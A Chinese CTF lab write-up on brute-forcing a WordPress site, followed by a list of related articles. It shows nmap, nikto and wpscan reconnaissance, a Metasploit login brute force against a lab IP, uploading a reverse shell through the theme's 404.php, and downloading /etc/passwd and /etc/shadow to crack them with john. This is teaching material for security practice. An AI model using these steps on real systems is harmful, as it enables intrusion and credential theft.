CTF实验:web安全暴力破解

最新推荐文章于 2024-05-01 12:43:04 发布
最新推荐文章于 2024-05-01 12:43:04 发布
阅读量884 收藏 4
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/floyd_art/article/details/105447222
版权

暴力破解漏洞介绍

穷举法的基本思想是根据题目的部分条件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证完毕。若某个情况验证符合题目的全部条件,则为本问题的一个解;若全部情况验证后都不符合题目的全部条件,则本题无解。穷举法也称为枚举法。
Web安全中的暴力破解也是利用尝试所有的可能性最终获取正确的结果。

信息探测

扫描主机服务信息以及服务版本

– nmap -sV 靶场IP地址
快速扫描主机全部信息
– nmap -T4 –A -v 靶场IP地址
探测敏感信息
– nikto -host http://靶场IP地址:端口
在这里插入图片描述
在这里插入图片描述

深入挖掘

分析nmap 、nikto扫描结果,并对结果进行分析,挖掘可以利用的信息;使用浏览器打开 http://ip:port/敏感页面,查看敏感信息,找到可利用的位置。
在这里插入图片描述
在这里插入图片描述
想办法要暴力破解,使用wpscan匹配user
wpscan --url www… --enumerate u
在这里插入图片描述

暴力破解

启动Metasploit -> msfconsole
msf > use auxiliary/scanner/http/wordpress_login_enum
msf auxiliary(wordpress_login_enum) > set username admin
msf auxiliary(wordpress_login_enum) > set pass_file /usr/share/wordlists/dirb/common.txt
msf auxiliary(wordpress_login_enum) > set targeturi /secret/
msf auxiliary(wordpress_login_enum) > set rhosts 192.168.1.13
msf auxiliary(wordpress_login_enum) > run
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
知道了密码也是admin
登录
在这里插入图片描述
执行shell,获取反弹shell。
http://192.168.253.20/secret/wp-content/themes/twentyseventeen/404.php
查看系统信息 sysinfo
查看用户权限 id
制作shell
在这里插入图片描述
上传
在这里插入图片描述
设置相应配置
在这里插入图片描述
在这里插入图片描述
浏览器启动shell.php
在这里插入图片描述
成功
在这里插入图片描述

root权限

– Metasploit中 利用返回shell 下载 download /etc/passwd download /etc/shadow
– 将文件转换为join可以识别的文件格式
unshadow passwd shadow > cracked
– 使用john破解密码
john cracked
在这里插入图片描述
在这里插入图片描述
知道了密码。

总结

提权时可以抓取 /etc/passwd 和 /etc/shadow ,之后使用join来破解对应的密码,然后使用对应的用户名密码提升root权限;
对于wp的渗透中,启动对应的主题,然后在404页面上传shell;

floyd_art
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
国科大web安全中期CTF.pdf
11-22
国科大web安全中期CTF
国科大web安全技术期末CTF.pdf
11-22
国科大web安全技术期末CTF
php file_put_contents 根目录权限,CTF复现环境搭建的中的file_put_contents()权限不够
weixin_35084134的博客
03-12 502
如图所示,在复现【CISCN2020】babyunserialize题目时发现出现此问题,该题目基本思路为通过PHP反序列化写入shell在环境搭建时,直接将从题目中下载的源码放到服务器上,在利用此payload时出现该问题,此处payload参照https://www.gem-love.com/ctf/2569.htmlnamespace DB;class Jig {constFORMAT_JS...
[CTF] CTFShow→WEB入门→爆破【web 21~web 28】
ZXW_NUDT的博客
12-21 3088
web 21 这个时候还是老样子,用Burp Suite Community Edition抓包 先随便输一个用户名密码 比如 用户名:admin 密码:123456 抓到的包有个base64加密的,解密看一下格式 所以这个格式是:用户名:密码 这样就可以利用所给的密码字典跑密码了 具体操作看这里:[CTFHub]基础认证:Here is you flag:click(webweb前置技能>HTTP协议) web 22 略 web 23 <?php /* # -*- coding: ut
2024年网安最全CTF题目合集_网络安全ctf大赛题库
最新发布
2401_84264610的博客
05-01 941
carrayjsondecodecm]):使用isnumeric函数检查数组d===false?
CTF-14.web安全暴力破解
woo233的博客
09-26 786
穷举法的基本思想是根据题目的部分条件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证完毕。若某个情况验证符合题目的全部条件,则为本问题的一个解;若全部情况验证后都不符合题目的全部条件,则本题无解。穷举法也称为枚举法。Web安全中的暴力破解也是利用尝试所有的可能性最终获取正确的结果。提权时可以抓取/etc/passwd和/etc/shadow,之后使用join来破解对应的密码,然后使用对应的用户名密码提升root权限;
ctf训练 web安全暴力破解
qq_43613772的博客
06-16 2528
此次的方法叫做穷举法,也成为枚举法。就是把可能问题一一列举出来。 第一步同样是信息探测(包括敏感信息的探测) 信息探测 这次只说一下信息探测的以往的语法: 扫描主机服务信息以及服务版本 nmap -sV 靶场IP地址 快速扫描主机全部信息 nmap -T4 –A -v 靶场IP地址 探测敏感信息 nikto -host http://靶场IP地址:端口 目录信息探测 dirb http://靶场I...
靶机测试之暴力破解(1)-原理篇
anan的博客
03-26 908
大家好,我是阿里斯,一名IT行业小白。今天我分享的内容是web登录入口处可能存在的暴力破解漏洞。本篇文章内容简单实用,会从原理、成因、防御,测试方法入手编写文章。文章来源我的公众号,大家可以关注下我的公众号:小白学IT 什么是暴力破解? 其实所谓的暴力破解就是连续性尝试+字典+自动化;所谓的连续性尝试就是指不停的利用不同的账号密码进行测试;那么字典就是不同的可能成功登录web的常用或通过信息收集利...
Web漏洞之暴力破解
weixin_64267091的博客
02-22 866
web渗透测试中的首要环节:信息收集部分,我们通过端口扫描可以知道开放的端口,由此我们也可以知道对应的服务协议分别是什么。今天就来总给一下:当我们遇到一些服务协议,如何进行暴力破解去获取对应的账号和密码。我们常见的协议有FTP,SSH,Telnet等,接下来我们就来看一下如何暴力破解
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
源码获取+ctf+web安全
10-08
源码获取,源码泄露+ctf+web安全
83.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结_杨秀璋的专栏-CSDN博客1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。前文学习:[网络
ctf+web安全+任意文件上传+任意文件下载
10-08
ctf+web安全+任意文件上传+任意文件下载
国内首本CTF赛事技术解析书籍,五年之约,兑现了
华章IT官方博客
07-01 929
新书速递每一个CTF战队的发展其实都面临着一个问题,那就是“如何传承”。作为一个联合战队,随着老成员走向工作岗位,如何用良好的机制实现新老更替,是战队管理者需要认真考虑的问题。我们也尝...
每天一道CTF 第二天
scrawman的博客
03-01 765
今天这个题目很简单,但我还是做了好久。有一些payload之前试了没成功后面再试又可以了,搞得我也很疑惑,不知道自己是不是之前引号没打对还是空格没打对。 进入正题: [极客大挑战 2019]EasySQL 题目就告诉我们了是要SQL注入 在用户名和密码分别输入admin’,password,报错显示如下 admin,password’,报错显示如下 admin’,password’,报错显示如下 结合三种情况来看,username使用的是单引号,password使用的是双引号。或者再用admin'#
协议层安全相关《http请求走私与CTF利用》
蚁景网安学院
05-24 1047
 0x00前言  最近刷题的时候多次遇到HTTP请求走私相关的题目,但之前都没怎么接触到相关的知识点,只是在GKCTF2021--hackme中使用到了CVE-2019-20372(Nginx<1.17.7 请求走私漏洞),具体讲就是通过nginx的走私漏洞访问到Weblogic Console的登录页面,然后打Weblogic历史漏洞读取flag。当时做那道题的时候对走私漏洞没有深入理解,今天打ISCC2022的时候又遇到了一道利用gunicorn<20.04请求走私漏洞绕wa...
任意文件读取与下载漏洞
热门推荐
qwzf
11-14 1万+
前言 上周参加了一个线上赛。有个Web题的WriteUp说是任意文件下载。由于之前没学过,所以就没有想到。现在学习一下 为什么产生任意文件读取与下载漏洞 一些网站的业务需要,可能提供文件查看或下载的功能,如果对用户查看或下载的文件不做限制,就能够查看或下载任意的文件,可以是源文件,敏感文件等等。 任意文件读取漏洞 任意文件读取是属于文件操作漏洞的一种,一般任意文件读取漏洞可以读取配置信息甚至系统重...
API接口服务漏洞发现与修复思路
永远是少年
01-02 1847
今天继续给大家介绍渗透测试相关知识,本文主要内容是API接口服务漏洞发现与修复思路。 一、端口服务漏洞发现与修复思路 二、API接口服务漏洞发现与修复思路 三、补充:信息收集小技巧
新手漏洞挖掘经验分享
Spontaneous_0的博客
03-14 335
新手漏洞挖掘经验分享
ctfweb安全经典题型
10-16
好的,关于ctfweb安全经典题型,我可以给你一些简单的介绍。 ctfweb安全经典题型主要包括以下几种类型: 1. SQL注入:通过构造恶意的SQL语句,从而实现绕过身份验证、获取敏感信息等攻击目的。 2. 文件包含:通过构造恶意的文件路径,从而实现读取任意文件、执行任意代码等攻击目的。 3. 文件上传:通过上传恶意文件,从而实现执行任意代码、获取服务器权限等攻击目的。 4. XSS攻击:通过注入恶意脚本,从而实现窃取用户信息、劫持用户会话等攻击目的。 5. CSRF攻击:通过伪造用户请求,从而实现执行任意操作、窃取用户信息等攻击目的。 6. 文件下载:通过构造恶意的下载链接,从而实现下载任意文件、获取服务器权限等攻击目的。 7. 逻辑漏洞:通过利用程序逻辑错误,从而实现绕过身份验证、获取敏感信息等攻击目的。 以上是ctfweb安全经典题型的主要类型,当然还有其他类型的题目。如果你想深入了解这些题型,可以去做一些相关的ctf比赛或者练习题目。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值